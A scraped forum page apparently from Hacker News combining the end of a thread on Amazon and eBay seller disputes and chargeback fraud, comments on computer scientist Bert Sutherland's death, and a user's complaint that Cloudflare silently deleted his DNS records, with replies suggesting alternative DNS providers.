I just did some googling, and it seems like eBay STILL doesn't support any form of 2FA aside from SMS-based one (which is exactly how, I suspect, they got into my account in the first place, as I didn't get my email compromised). What a shame, but oh well.

_-___________-_(4150) 3 days ago [-]

I tried, once, to sell something on eBay. I specified clearly that I would only ship the item to the UK. Someone bought it with a shipping address in Portugal. I refused to ship it. eBay 'rejected' my refusal. I sold it on Gumtree instead. eBay charged me success fees for the item, since it had 'sold'. eBay refused to communicate with me about refunding these success fees, so I filed a chargeback with my credit card company. eBay closed my account because of the chargeback.

heavyset_go(4298) 4 days ago [-]

I'm getting ads that state if I buy the ad-purchaser's product on Amazon and leave a good review, they'll refund my money. Basically, they're ads that say 'Free [Product]!' and when you click them, they ask you to purchase the product, leave a positive review and then they'll refund you.

I tried to look for a way to report the seller to Amazon, but from what I found, I need to have a seller account with Amazon to do so, which I don't. As a customer, I can't report the product without buying it first. Does anyone have a link or email I can use to reach out to someone at Amazon about this?

Some of these products have thousands of positive reviews[1]. I find it misleading, and to be a nuisance to consumers who rely on these reviews to guide their purchases. I don't know why Amazon makes it so difficult to report these fraud schemes.

Since I found it difficult to reach out to Amazon, I reported the seller to my state Attorney General's consumer protection division and to the FTC. Since then, I've gotten even more ads like this, and I don't have the time to report them all to agencies that may or may not follow up on my reports.

[1] https://www.amazon.com/dp/B07NRGR9LL

milankragujevic(2321) 4 days ago [-]

Similar thing happened to me with PayPal, buyer got to keep the item, and got a refund (by doing a chargeback on their CC) and I got billed the amount + 15% of fees and punishment. I provided exhausting proof of delivery and that there was no contact or complaints from the buyer, but they didn't care. They said, since it's a chargeback, they HAVE to give them their money back. The buyer was a client of Commonwealth Bank of Australia.

Ironically, when I tried doing a chargeback on a transaction as a buyer, I got denied after waiting for 30 days for a reply, and had to pay a fee for an 'untruthful claim'. The bank is Erste Bank in Serbia. In my opinion my claim was valid, as the seller did not reply to me at all.

nicolas_t(4200) 4 days ago [-]

Interestingly about chargeback, I've noticed the same. I tried to file a chargeback with my bank in France and got denied despite it being a valid claim and me providing all the documentation for it.

But, when I used my US credit card to file a chargeback it went through fine and there was no issue. I wonder if some countries are more lax with charge backs?

pxtail(10000) 3 days ago [-]

This is recurring theme with PayPal and some US citizens are perfectly aware that when it comes to dispute they'll get preferential treatment versus non-US based seller and money returned no matter what.

This mechanism is quite often used for frauds and unaware entrepreneurs can be robbed out of money - PayPal will refund money, close case without hesitation. I think that only solution would be to use court route but in some cases equipment cost may be lower than attorney and court related costs (in addition to seller not being used to procedures, not aware of what to do).

ikeboy(447) 4 days ago [-]

>I denied the return.

And that's your problem. If you deny a return within the return period, you're in violation of Amazon policy, and the A-Z team will rightly rule against you. The correct response is to accept the return, then deny a refund after it comes back to you because it wasn't sent back with the same accessories you sent it with.

normalnorm(10000) 3 days ago [-]

> If you deny a return within the return period, you're in violation of Amazon policy, and the A-Z team will rightly rule against you.

Amazon makes the laws and acts as a court now? I don't understand why people respect 'company policy' so much. The laws of the land take precedence. We are not corporate slaves.

scottlamb(10000) 4 days ago [-]

Why do they have a 'violate policy and eventually lose dispute' button then?

stordoff(10000) 4 days ago [-]

> S-2.2 Cancellations, Returns, and Refunds. The Amazon Refund Policies for the applicable Amazon Site will apply to Your Products. Subject to Section F-6, for any of Your Products fulfilled using Fulfillment by Amazon, you will promptly accept, calculate, and process cancellations, returns, refunds, and adjustments in accordance with this Agreement and the Amazon Refund Policies for the applicable Amazon Site

https://sellercentral.amazon.com/gp/help/external/G1791

> What should I do if a buyer wants to return an item?

> All Amazon sellers are required to accept returns.

https://sellercentral.amazon.com/gp/help/external/G200495860

lukevdp(4317) 4 days ago [-]

I came here to say this also. You can't reject the return, you need to accept it and then it's on the buyer to return the item to you.

If it comes back with parts missing, you can do a partial refund. Buyer can still do an A-Z claim, but you're in a much stronger position, especially if you have proof of how you sent it and how you received it.

tus88(10000) 4 days ago [-]

There is no perfect system that protects buyers and sellers. Change the rules and buyers will be complaining. The reason it is skewed towards buyers is:

1) who in there right mind would buy something online where there is no protection (sellers aren't the same as they have to sell somewhere to make a living).

2) most buyers are honest who just want their item. Profiting from fraud as a buyer is a lot more work as they need to resell the item to gain currency, which is risky (both from exposing themselves to stolen item investigations as well as being a victim of fraud themselves as a seller).

3) imagine if sellers could just ship rocks to buyers instead of cameras without consequence. Every scammer and his dog would be in on the gig without 5 seconds. (1) becomes even more bleak.

The general view is sellers need to take fraud into their overall operating expense budget, just like department stored do with shoplifting.

briandear(1417) 4 days ago [-]

> The general view is sellers need to take fraud into their overall operating expense budget, just like department stored do with shoplifting.

How's that work when selling a single item?

bcrosby95(10000) 4 days ago [-]

> 1) who in there right mind would buy something online where there is no protection (sellers aren't the same as they have to sell somewhere to make a living).

Buyers also generally have to buy somewhere, especially for necessities. The difference is that finding a place to buy is easier than finding a place to sell.

> 2) most buyers are honest who just want their item. Profiting from fraud as a buyer is a lot more work as they need to resell the item to gain currency, which is risky (both from exposing themselves to stolen item investigations as well as being a victim of fraud themselves as a seller).

You don't have to just resell to profit. Just buy stuff you want anyways then complain.

> 3) imagine if sellers could just ship rocks to buyers instead of cameras without consequence. Every scammer and his dog would be in on the gig without 5 seconds. (1) becomes even more bleak.

The current system works because there are many buyers and few sellers. Most people are honest. And everyone buys things. But most people don't sell things. Skewing in favor of the buyer makes it so the few sellers aren't overrun by fraudsters. If even 10% of the dishonest people in the world were actively selling stuff on Amazon, it would probably be a huge problem.

freepor(10000) 4 days ago [-]

A seller can absorb fraud when they're doing hundreds or thousands of transactions. If each person is doing one transaction the people hit will have life altering consequences for some items.

CamelCaseName(4319) 4 days ago [-]

Wrong takeaway.

If you're going to sell on Amazon, use FBA.

A-z claims cannot be filed on FBA orders.

If this is in fact your last sale on Amazon, and you no longer intend to do business with them, email [email protected] as a last resort.

Keep in mind, that email should not be used lightly. Be succinct and stoic. Provide proof that you have done everything else to resolve the matter.

jasd(10000) 4 days ago [-]

It is unlikely that your email catches his(his team's) attention. However, if it does, rest assured that he will shake things up to fix the root cause of the issue and likely get the team to refund your money as well.

csours(4107) 4 days ago [-]

Can you use FBA for one-off, used items?

lucasmullens(10000) 4 days ago [-]

Does emailing the CEO really work? If I contact regular Amazon support, I end up talking to a bot presumably since their employee time is so valuable. But I can just hit up Jeff like it's no big deal?

Honestly asking, there might be some special team to go through the [email protected] emails.

GuardLlama(4175) 4 days ago [-]

Meta takeaway, probably:

A popular PetaPixel post that gets coverage on additional social platforms is your only form of recourse against Amazon.

node1(10000) 4 days ago [-]

I have heard many stories online where customers bought new graphic cards/cpus/camera gear from 'Sold by Amazon.com' but instead receive used ones. Or receive different cheaper (older generation) products.

It does not seem to be a good place to buy or sell expensive items.

tiborsaas(3977) 3 days ago [-]

I had the opposite happen to me :)

I ordered a 2017 Dell XPS and got the 2018 model instead, didn't complain.

simmers(10000) 4 days ago [-]

I've received two used products from Amazon (bought as 'new') in just the last year. First was an espresso machine. It wasn't even cleaned - coffee grounds were everywhere. The second was a robot vacuum that had a full dust bin. After turning it on, I could see the previous owner's home layout in its memory. In both cases, the product still worked and it wasn't worth the hassle of returning. Whenever I buy something, I make sure to check for non-Amazon alternatives, even box stores.

endorphone(3068) 4 days ago [-]

That can happen anywhere, through any medium (e.g. bricks in a box instead of a PS4 from Best Buy). It seems amply evident, despite the recurring horror stories on HN, that most customers are having a pretty decent time of using Amazon.

In any case, isn't the author's scenario pretty bizarre? I had no idea that Amazon served as a mechanism for selling one-off small scale used items. Further the author mentions that it would be cheaper buying and selling than renting...only this is precisely the risk you need to factor in buying and selling (which could have been a fake cheque, getting rolled during the exchange, etc).

monomad1(10000) 4 days ago [-]

I bought a lamp for a rear projection tv a couple years ago. It burned out after a month. Amazon let me return it, but charged a restocking fee. That would've been fine, but I haven't been able to review the product for over a year now.

Fuck amazon - newegg is cheaper anyway.

jseliger(16) 4 days ago [-]

I can't imagine buying or selling most high-value items on Amazon: the buying side has already been covered in various places (https://seliger.com/2017/01/09/tools-continued-careful-buy-a...). I've sold cameras and lenses on Craigslist, which can have its own challenges, but never one as expensive as an A7R IV.

koolba(628) 4 days ago [-]

At least on Craigslist you can restrict the sales to meatspace.

Asking to meet on the steps of a police station does a great job of filtering out scammers.

cortesoft(10000) 4 days ago [-]

I spend tens of thousands of dollars on Amazon every year, buying everything from electronics to groceries to paper towels, and have never had any issues that were not resolved to my satisfaction.

jfim(10000) 4 days ago [-]

Wouldn't that be a good small claims court case? There's good documentation that the item has been shipped, and the seller is out of both the money and the camera.

uniformlyrandom(4307) 3 days ago [-]

I think that would be a good FBI case. I am sure it is a minimum of 2 charges, probably more (conspiracy to commit fraud over the state line, wire fraud).

TomMckenny(10000) 4 days ago [-]

Thief's last name is just an initial.

I say 'thief' because that's how it looks to me. But how can I or Amazon be confident given the evidence I've only just read about?

What would help is posting up front a list of evidence that would convince Amazon in case of a dispute. If Amazon does not provide this then perhaps a third party could figure it out and post it.

ikeboy(447) 4 days ago [-]

Amazon may suspend your account for doing so. It happened in the case I linked at https://news.ycombinator.com/item?id=22388122

Wowfunhappy(4075) 4 days ago [-]

But when you use Amazon you agree to binding arbitration...

freepor(10000) 4 days ago [-]

Ultimately when you mail something there is no way to prove what you mailed. You can mail a brick and say it was a camera or you can mail a camera and the buyer can say it was a brick. There's an opportunity here for companies with big real estate footprints like UPS store or Office Depot to offer verified shipping and/or receiving, where you hand them the items and they pack them up and ship them with a certification of what's inside.

onemoresoop(2520) 4 days ago [-]

Good but not scam-proof, there can be a brick in a camera case in a box. The verified shipping says camera in a box. I don't really mean brick here but the item could be a defective item, a different model or something the verification process could miss.

zxcmx(10000) 4 days ago [-]

That would be great and raise the bar, but the same dispute issues would exist, just with authenticity of goods.

Scammy buyer would purchase say, 32GB sticks of RAM and ship back 1GB sticks with the stickers swapped.

deadmetheny(3772) 4 days ago [-]

Sounds about right. Amazon's return policies have always heavily favored customers, even after creating the marketplace.

jacquesm(45) 4 days ago [-]

No, especially after creating the marketplace. Before that Amazon would had a much stronger incentive to treat the customers and themselves in a more balanced way.

akurilin(4317) 4 days ago [-]

Startup idea: create a high quality camera gear buying and selling experience for the web, with many protections and conveniences built in. Selling your gear on Craigslist and meeting with random strangers at McDonald's and Starbucks is pretty much the only real alternative right now and gets old pretty fast.

This was an issue for music gear too, but somehow reverb.com managed to address it and make it a pretty painless experience. Their customer service is excellent, and if one of the two parties are unsatisfied, they'll intervene and try to find a compromise. They send you boxes to ship your gear in, they set up shipping for you, they automatically track the shipment as it gets picked up etc. I've been hoping to find something similar for camera gear, but have had no luck so far.

The only downside is that the prosumer camera equipment world seems to be rapidly shrinking, so it might be not a great idea to step into this space right now. Whereas there doesn't seem to be a dearth of people buying guitars, drum kit pieces and effects pedals.

y2bd(4314) 4 days ago [-]

Keh (https://www.keh.com/) is sort of like this, except that they function more like a second-hand shop--you sell them your gear, and they hold inventory that other people can buy, meaning you never actually interact with the eventual buyer. Because of this though, I imagine they take a larger cut than Reverb does (and certainly more than eBay).

As a buyer I've had zero problems with Keh the couple of times I've used them.

TravelTechGuy(4051) 4 days ago [-]

Sad story, though not uncommon. I heard many eBay horror stories involving buyers' scams.

Frankly, selling anything on Amazon is crazy. But if you do have to, vet your buyer. Look at their previous purchases and feedbacks. Avoid the quick deal that will blow in your face.

The bottom line is that eBay (and Amazon too) are more focused on the buyers. Buying on eBay is great, because you have 100% buyer protection. There's no seller protection at all.

I'd recommend sticking to either local selling apps (like Craigslist etc.) where you can verify the buyer (though stay safe and do it somewhere public), or through online communities that manage access and feedbacks (there are several on Reddit and Facebook).

city41(3280) 4 days ago [-]

I was surprised the article mentioned eBay as a better alternative as a seller. It really isn't, eBay will side with the buyer pretty much every time.

freepor(10000) 4 days ago [-]

If reading this story makes your blood boil, and you need some catharsis, there's a story online that I can't find right now about a guy who went to the address of the fraudster and beat him with a piece of rebar giving him a permanent limp.

stordoff(10000) 4 days ago [-]

I'm not sure in what world fraud is equivalent to a permanent debilitating injury, but even if it it was, that doesn't make it right.

And even if it did, how do you know it's the right person? There are 5 people in my house (and I regularly ship things to other addresses). Do you just pick one and hope for the best?

onemoresoop(2520) 4 days ago [-]

Maybe that was an innocent person. Scammers are known to use other people's addresses, they know when the person is not at home and when the package arrives and just go loot it.

crmrc114(10000) 4 days ago [-]

Did you sell it as used? If you opened the package and touched the product it can no longer be sold as new. I have called out sellers on this crap before and gotten my money back. When I order new I expect a factory sealed box. (Also illegal in the US https://www.law.cornell.edu/cfr/text/16/20.1 )

So assuming you sold this as used, that sucks I feel for you. However if your one of those scumbags who sells used things on Amazon as new I have no sympathy and I would happily report you for my money back. (I have encountered this maybe twice in all the electronics I buy on Amazon)

If you want to sell used things you have opened, flag them as such on Amazon or go to Ebay. I buy from both places and will always take a deal on a cheaper gently used item if its disclosed up front.

Edit: For clarity, FTA > 'To this day, I have no idea what he claimed was "missing" from the package. I even included all the original plastic wrap!' He opened a factory box and unwrapped the product. How else would he photograph all the parts with the kit?

jacquesm(45) 4 days ago [-]

That could very well be but then the 'buyer' should return the goods.

OrgNet(2457) 4 days ago [-]

> I sold a mint-in-box Sony a7R 4

Ensorceled(10000) 4 days ago [-]

When this happens, and you get your money back, do you keep the product?

tempestn(1530) 4 days ago [-]

Does Amazon not have a 'New, open box' option?





Historical Discussions: Bert Sutherland Has Died (February 19, 2020: 680 points)

(680) Bert Sutherland Has Died

680 points 6 days ago by dang in 195th position

en.wikipedia.org | Estimated reading time – 6 minutes | comments | anchor

American computer scientist

William Robert 'Bert' Sutherland (May 10, 1936 – February 18, 2020) was an American computer scientist who was the longtime manager of three prominent research laboratories, including Sun Microsystems Laboratories (1992–1998), the Systems Science Laboratory at Xerox PARC (1975–1981), and the Computer Science Division of Bolt, Beranek and Newman, Inc. which helped develop the ARPANET.

In these roles, Sutherland participated in the creation of the personal computer, the technology of advanced microprocessors, the Smalltalk programming language, the Java programming language and the Internet.

Unlike traditional corporate research managers, Sutherland added individuals from fields like psychology, cognitive science, and anthropology to enhance the work of his technology staff. He also directed his scientists to take their research, like the Xerox Alto 'personal' computer, outside of the laboratory to allow people to use it in a corporate setting and to observe their interaction with it.

In addition, Sutherland fostered a collaboration between the researchers at California Institute of Technology developing techniques of very large scale integrated circuits (VLSI) — his brother Ivan and Carver Mead — and Lynn Conway of his PARC staff. With PARC resources made available by Sutherland, Mead and Conway developed a textbook and university syllabus that helped expedite the development and distribution of a technology whose effect is now immeasurable.[1]

Sutherland said that a research lab is primarily a teaching institution, 'teaching whatever is new so that the new can become familiar, old, and used widely.'[2]

Sutherland was born in Hastings, Nebraska on May 10, 1936,[3] to a father from New Zealand; his mother was from Scotland. The family moved to Wilmette, Illinois, then Scarsdale, New York, for his father's career. Bert Sutherland graduated from Scarsdale High School, then received his bachelor's degree in electrical engineering from Rensselaer Polytechnic Institute (RPI), and his master's degree and Ph.D. from Massachusetts Institute of Technology (MIT); his thesis advisor was Claude Shannon. During his military service in the United States Navy, he was awarded the Legion of Merit as a Carrier ASW plane commander. He was the older brother of Ivan Sutherland.[4] Bert Sutherland died on February 18, 2020, aged 83.[5][6]

References[edit]

  1. ^ Hiltzik, Michael. '2 Brothers' High-Tech History in California.' Los Angeles Times, February 19, 2004.
  2. ^ Sutherland, William R. 'Bert', 10 Years of Impact: Technology, Products, and People: Foreword to 10th Anniversary Volume Archived March 15, 2004, at the Wayback Machine, Sun Microsystems, Inc.
  3. ^ Kalte, Pamela and Nemeh, Katherine, 'American Men & Women of Science: Q-S' Thomson/Gale, 2003
  4. ^ Sutherland, Bert (February 21, 2020) [Interview took place on May 25, 2017]. 'Oral History of Bert Sutherland' (Interview). Interviewed by David C. Brock and Bob Sproull. Computer History Museum, Mountain View, California: YouTube. Retrieved February 21, 2020.
  5. ^ Computer History Museum [@ComputerHistory] (2020-02-19). 'Today we salute Bert Sutherland, who passed away yesterday' (Tweet) – via Twitter.
  6. ^ '复制粘贴 UI 之父、Java 和互联网创建者相继离世' (in Chinese). CNBeta.com. 21 February 2020. Retrieved 21 February 2020.



All Comments: [-] | anchor

rococode(3195) 6 days ago [-]

Here are some tweets about it:

https://twitter.com/search?q=Bert%20Sutherland&src=typed_que...

This one appears to be the first (18 hours ago):

https://twitter.com/harrymccracken/status/123000105692436070...

The Computer History Museum has since tweeted about it:

https://twitter.com/ComputerHistory/status/12302002771412500...

KerrickStaley(3898) 6 days ago [-]

Thanks! The Computer History Museum seems like a reliable source on this.

I've added their tweet as a citation on the Wikipedia page.

alankay(10000) 5 days ago [-]

I knew Bert for well over 50 years, and the first word that comes to mind to describe him is 'lovable', and the second is 'foundational'.

It is too early for those of us who loved him to recount 'Bert stories' and especially 'Bert and Ivan' stories, but Dan has provided the links to the YouTube video CHM tribute to the two brothers. Everyone should also read the Wikipedia article about Bert.

Bert's PhD thesis is most often characterized by its title 'Online Graphical Specification Of Procedures', but once you look at it you realize that he was one of the first (if not the first) inventor of 'dataflow' programs, and in fact this thesis was central to the many 'prior art' definitions to quash lawsuits about dataflow ideas.

Another dimension to Bert's scientific and engineering career that is not mentioned enough is that he was one of the earliest and main drivers of what is called CAD today (a rather small number of people in different places made this happen in the early 60s -- including Bert's brother Ivan -- and Bert focused some of the powerful human and computing resources of Lincoln Labs on this vital technology).

Bert's personality was sunny, friendly, and 'sweetly firm', to the point that many people clamored to have him as their manager (including only half-jokingly: Ivan). I was completely thrilled when Parc brought in Bert to run the Systems Science Lab in which my group, Lynn Conway's group, Bill English's group etc were all ensconced.

Bert, as with the other enlightened ARPA research managers knew that 'the geese wanted to lay their golden eggs' and the manager's job was to support these efforts, not to try to tell the geese how to lay the special eggs). He was superb at this, and many critical inventions and systems happened because he was the nurturer.

I guess I should tell a 'Bert and Ivan' story. Their father was a civil engineer who brought not just blueprints home but gadgets and kits for the two brothers -- who were just two years apart in age -- to play with. Bert would recall that Ivan was so smart that he would just start putting the stuff together while Bert read the manual. At the 95% point Ivan would get stuck and Bert would know what to do next. The two brothers with very different personalities got along wonderfully well over their entire lives, and would occasionally do a company together.

A big deal when the kids were young was their mother driving them down from Scarsdale to Murray Hill to Bell Labs to meet Claude Shannon. Years later at MIT, Shannon wound up being a thesis supervisor of both of their PhDs done a few years apart.

I think most of us from 50+ years ago in the ARPA community just revered and were in awe of the research generations that came before us, especially the one right before us. It was tough to do computing back then, but they didn't let this bother them at all. They would program anything they wanted to have happen -- mostly in machine code -- and they would design and build any hardware they needed to run the programs they needed -- mostly with discrete components and relatively high voltages over sometimes acres of computer.

They showed us how to work and play and design and sculpt and the deep art that lies behind the components. We can never thank them enough, and can only 'pay forward' by helping those who come after us.

dylanrw(4291) 5 days ago [-]

This is very edifying. Thank you for sharing.

sprafa(4175) 5 days ago [-]

Claude Shannon teaching them makes them essentially computer science royalty.

agumonkey(877) 5 days ago [-]

Wow, I didn't know Ivan had a brother. Feels like a hidden jedi brother.

kashyapc(10000) 5 days ago [-]

'Unlike traditional corporate research managers, Sutherland added individuals from fields like psychology, cognitive science, and anthropology to enhance the work of his technology staff.'

/me wonders how many 'modern' managers approach their work with that kind of sensibility.

52-6F-62(3698) 5 days ago [-]

They do bring in people from other various disciplines, but most of the time you'll find those people in product management/ownership roles or 'scrum leaders' or something. Usually not using their accumulated knowledge for much outside of communicating clearly and navigating politics enough to hold a job.

We definitely don't see enough deference to those fields of expertise, I think.

craftyguy(3311) 6 days ago [-]

These 'XYZ has died' posts should nearly include a short description of who the person was in the title.

saagarjha(10000) 6 days ago [-]

They almost always link to a page that do this.

gjs278(10000) 5 days ago [-]

yep. but they won't. HN rules thee not for me. they do titles like this all the time.

jacquesm(45) 5 days ago [-]

For a fairly large chunk of the HN crowd Newman, Sutherland, Sproull, Dijkstra, Knuth and Kay are household names.

The fact that computer science is one of the few domains where new entrants simply accept the status quo and do not spend a minute on understanding how we got here is a problem. For one it creates a disconnect between the older (and often wiser) generation in the field and the new comers. For another that disconnect then results in endless re-invention of the same wheels. Because by the time the new cadre has acquired the wisdom the cycle will repeat.

Try imagining a modern day genetics student who does not know who Crick & Watson are. That's your typical CS specialist.

dang(195) 6 days ago [-]

A 1966 demo of his pioneering Ph.D. work on interactive visual programming: https://www.youtube.com/watch?v=NLyIYmPfCps.

His Ph.D. dissertation is here: https://dspace.mit.edu/handle/1721.1/13474. It was some of the earliest work on dataflow and graphical programming. I know this because Alan Kay told me to read it, so I did. You should too.

Edit: Bert, of course, was Ivan Sutherland's (of Sketchpad) older brother. There's a delightful dialogue with the two of them from 2004: https://www.youtube.com/watch?v=sM1bNR4DmhU ('Mom Loved Him Best: Bert & Ivan Sutherland').

dekhn(10000) 6 days ago [-]

Love the PhD. 'Thesis advisor: Claude Shannon'.

For those that aren't familiar, the TX-2 is one of the systems that led to modern interactive computers. It was far more powerful than you would expect for a computer in 1958, the company DEC was basically founded on this computer's architecture, remarkably advanced computer graphics and image perception was being done (https://dspace.mit.edu/bitstream/handle/1721.1/11589/3395912...)

lincoln labs, where it was hosted, was a fertile area of research at a time when far more people were in favor of academic military research (MIT played a huge role in WWII).

I built a visual programming system for grid computing a while ago and it's interesting how often this paradigm keeps coming up in random places, like music making, blender effects pipelines, etc, etc. You'd think that researchers would design neural network architectures in visual programming space, not in a programming language.

lallysingh(4187) 6 days ago [-]

Isn't that his younger brother Ivan?

KerrickStaley(3898) 6 days ago [-]

EDIT: Citation has been found, see comments.

Just a note: the Wikipedia article currently doesn't cite any sources stating that he has died, and I wasn't able to find anything on the internet. So it's not totally clear at this moment that the title is true.

dang(195) 6 days ago [-]

I'm basing this on https://news.ycombinator.com/item?id=22363476 and the fact that the Wikipedia article has a precise date. I sure hope it isn't wrong; that would be awful. I also emailed Alan to ask if he had a minute to come and post about it, because moments like this are learning occasions for younger (and not so younger) community members who don't know the history.




(677) Cloudflare silently deleted my DNS records

677 points about 23 hours ago by iudqnolq in 3915th position

txti.es | Estimated reading time – 4 minutes | comments | anchor

Cloudflare silently deleted my DNS records

Yesterday I followed up with a potential client to ask them what they thought of the proposal I sent them the previous Thursday. I was shocked to learn that they thought they had emailed me the same day to accept.

I began debugging, and figured out there was an issue with my MX records. The problem: there weren't any. In fact, I had no DNS records at all. I logged in to Cloudflare and was told 'You currently don't have any websites' and prompted to add a site.

At this point I thought I had been hacked, so I went to the audit log. The only recent event:

Date: 2020-02-18T22:52:34-05:00 User IP Address: 127.0.0.1 Resource: Zone Audit Record: {{redacted}} Metadata: { 'Zone name': 'danielzfranklin.org' }

The 'user' IP address immediately stood out to me: 127.0.0.1. At this point I believed this was some sort of bug on Cloudflare's end, so I went to file a support ticket. Before I could file a ticket, Cloudflare required me to search their support base.

Cloudflare 'helpfully' pointed me to the relevant help center article: 'Why was my domain deleted from Cloudflare?' 1. From it, I learned that the official way Cloudflare communicates that they have deleted your domain is by placing an event in the audit log with an IP of 127.0.0.1.

If I intentionally set out to build a horrible user experience I'm unsure if I could top this. I naively expected that I would be notified by email before Cloudflare broke everything. In the absence of that, I would expect to see a notice when I logged in. In the absence of that, I would expect to see a field in the audit log mentioning in human language what happened. In the absence of that, if for some arcane reason Cloudflare is unable to change the format of their audit logs, I would at a minimum expect a message on the audit log page that explained what a deletion logged to 127.0.0.1 means. I registered for Cloudflare with a Gmail address specifically so that I could receive notifications from them if there were issues with my email setup.

Unfortunately, the help page their ticketing system pointed me to is completely unhelpful. For some reason I trusted Cloudflare with both my registration and DNS, and every debugging step mentions at the top that 'It is not necessary to check domain registration for domains utilizing a Cloudflare CNAME setup.' The help page provides no information on why a domain registered with Cloudflare would be deleted.

To add insult to injury I learn that when Cloudflare automatically detects an anomaly with your domain they permanently delete all DNS records. Mine won't be difficult to restore, but I'm not sure why this is necessary. Surely it would be possible for Cloudflare to mark a domain as disabled without irrevocably deleting it? Combined with the hacky audit log, I'm left with the opinion that for some reason Cloudflare decided to completely half-ass the part of their system that is responsible for deleting everything that matters to a user.

Because Cloudflare deleted my domain registration I can't change the status from clientTransferProhibited through their dashboard so I don't think I can even leave.

I spent some time thinking about if it was fair for me to post this on the same day as I filed a support ticket with Cloudflare. I ultimately decided to because their ticketing system recommended I post on their community forum instead or in addition to submitting a ticket. The page informed me that because I don't have a business account I would receive much faster support from the 'community'. However, I'm unable to log in to their community forum. When I click the login button I'm redirected to my dashboard, and when I then click Support on the dashboard I'm redirected back to the forum without being logged in. I suppose it's possibly an issue with Firefox blocking cookies (although I disabled tracking prevention) so it's possible this part is partly a problem on my end.

Does anyone know what might have caused Cloudflare to delete my domain? Any ideas for how I could transfer my domain away from Cloudflare sooner?

Daniel Franklin

Edit: I gave Cloudflare permission to publicly disclose details 2. iudqnolq is my HN username.

txti




All Comments: [-] | anchor

paulfurley(3962) about 22 hours ago [-]

FWIW I recently evaluated a few DNS companies after Namecheap ballsed up our MX records in a similar way.

I actively looked for someone we could pay money to, so we are their customer (as opposed to being a free tier user, effectively a cost)

The winner was DNSimple[1], who do exactly 1 thing, and they do it extremely well. And they are small enough to not take themselves too seriously[2], which I really appreciate.

Oh and their normal support channel is email, and everyone in the company takes a turn. I tested out their support before signing up and quickly heard back from a competent engineer, so they passed that test too.

[1] https://dnsimple.com [2] https://dnsimple.com/dnsound <— bonkers

znpy(1679) about 22 hours ago [-]

Have you considered Route53 ?

iudqnolq(3915) about 22 hours ago [-]

Thank you. Looks like I'll just have to pay more. Any recommendations for a registrar?

iruoy(10000) about 22 hours ago [-]

NS1 could be another one to look at. I have never used their services (directly), but I've noticed Netlify uses them for their DNS services.

SnowingXIV(4064) about 21 hours ago [-]

I did the same after getting tired of NC's DNS interface. I host a few client sites with Netlify[1] anyways and moving over to their DNS (NS1) has been a breath of fresh air. It is free but they do have some paid options and the is UI dead simple which should be a requirement. Feel fairly confident I can rely on them to not muck up DNS records as this is critical to mail systems, websites, etc.

Two years ago there was a moment where I was close to working for them too so I always try to use their products where I see fit. :)

[1] https://docs.netlify.com/domains-https/netlify-dns/

pmlnr(1470) about 22 hours ago [-]

Digitalocean has free dns service with an api; it's good and reliable.

Running my own dns looks more and more reasonable though.

homero(4183) about 11 hours ago [-]

Last i checked rackspace has good free dns

therealmarv(3234) about 23 hours ago [-]

Also don't forget: Cloudflare breaks many second and third world countries' Internet with their DNS captchas because they think the good guys live only in first world countries (maybe look up the word discrimination in your dictionary cloudflare) and force them to install extensions like PrivacyPass because they think 'we are so big and know what is right for the world'.

input_sh(3695) about 23 hours ago [-]

That's CDN captcha, not DNS. If you use Cloudflare solely as a DNS provider, your users don't see the captcha. If you route your traffic through their servers, then they do.

potency(10000) about 22 hours ago [-]

Cloudflare lost my support when they started de-platforming people for holding opinions they didn't agree with. Censorship outside of strictly legal bounds should not be tolerated from a company as powerful as Cloudflare.

J5892(10000) about 22 hours ago [-]

What sites have they de-platformed outside of legal bounds?

RL_Quine(10000) about 22 hours ago [-]

Why do you think you have a right to host with them? You don't, you have a privilege that's extended by them. You're welcome to host your own thing somewhere else.

mavhc(4215) about 22 hours ago [-]

Is it censorship if they refuse their money for a service? Pretty sure that's just business. Are they stopping you having a website?

sjburt(10000) about 22 hours ago [-]

At least in some cases, those people were claiming that because they hadn't been removed, Cloudflare supported them. I don't see what other option Cloudflare had at that point.

Mojah(1114) about 21 hours ago [-]

Occasions are rare where I get to say 'hey, I built a thing that might help here!' - so forgive me as I take this opportunity with both hands.

Whether this was a bug or a rare protective mechanisme, there will be times when your DNS provider makes a mistake and removes records. You mentioned in your post your DNS isn't hard to reproduce, but how certain are you that _all_ records are restored? How long do you have to fight DNS issues before it's OK?

I built DNS Spy [1] for this exact occasion. It monitors your DNS for any changes made, keeps a version of all DNS records (current & former) and allows you to restore/download a BIND9 zone file for your zone. You can easily import this into any commercial DNS provider or in your own BIND9/PowerDNS setup.

I would love to hear feedback on how DNS Spy could be improved when DNS disasters like these occur!

[1] https://dnsspy.io/

ancarda(3516) about 7 hours ago [-]

Just signed up - it's pretty nice. Any plans to add SSHFP or other record types?

im3w1l(4304) about 19 hours ago [-]

The issue I see with this is that

1) You can't use it after the fact.

2) It's very specialized.

People are not going to set up dozens and dozens of services to monitor for really rare things. It should be part of general purpose monitoring suite.

archon810(1228) about 14 hours ago [-]

Just wanted to point out that the menu doesn't work properly on mobile in case you want to fix it.

https://imgur.com/a/TcibAKs

donmcronald(10000) about 17 hours ago [-]

How do you get all records for domains that don't allow zone transfer (most don't)? I've always thought it was impossible to get 100% accurate results with normal DNS queries (ex: ALL).

bauerd(10000) about 17 hours ago [-]

>but how certain are you that _all_ records are restored?

A solution to this is to keep DNS under version control with eg Terraform and deployed by CI. master is then authoritative

homero(4183) about 11 hours ago [-]

Do you use the cloudflare api to get them all? Otherwise you'll miss some

hashhar(3977) about 20 hours ago [-]

Looks really useful and fulfills a very important purpose. What good is all your backups if you can't get your services back up due to missing DNS configuration.

collinmanderson(1506) about 15 hours ago [-]

Nice! A few years ago I whipped up something simple using dig, diff, cron and some bash scripts. It's handy to get alerted when something changes, and I've definetly caught a few unintentional changes.

iudqnolq(3915) about 20 hours ago [-]

(OP here). That looks really useful. If I was running a real service I would definitely look into it. Because this is just the personal website and email of a college student I don't think I could justify the expense when using something like Uptime Robot to monitor if a single record points to a web server would probably give me close to the same reliability.

techslave(4158) about 1 hour ago [-]

DNS Spy costs money? wow the art of sysadmin really is dead. having this kind of tight control of DNS used to be a given.

jgrahamc(23) about 22 hours ago [-]

This is being looked into internally and I am involved. Likely won't post an update here as it pertains to a customer account (unless customer agrees).

BTW If you, dear reader, ever find yourself so frustrated with Cloudflare that you feel like your only recourse is a blog post... my email is [email protected] and I'm happy to hear from people.

p1necone(10000) about 20 hours ago [-]

The problem is that big companies don't care about giving quality support for their products, and for the most part they get away with it. From their perspective there's no problem to solve.

Your solution basically boils down to 'companies are failing at escalated support issues well, so they should escalate support issues well.'

martin1975(4268) about 21 hours ago [-]

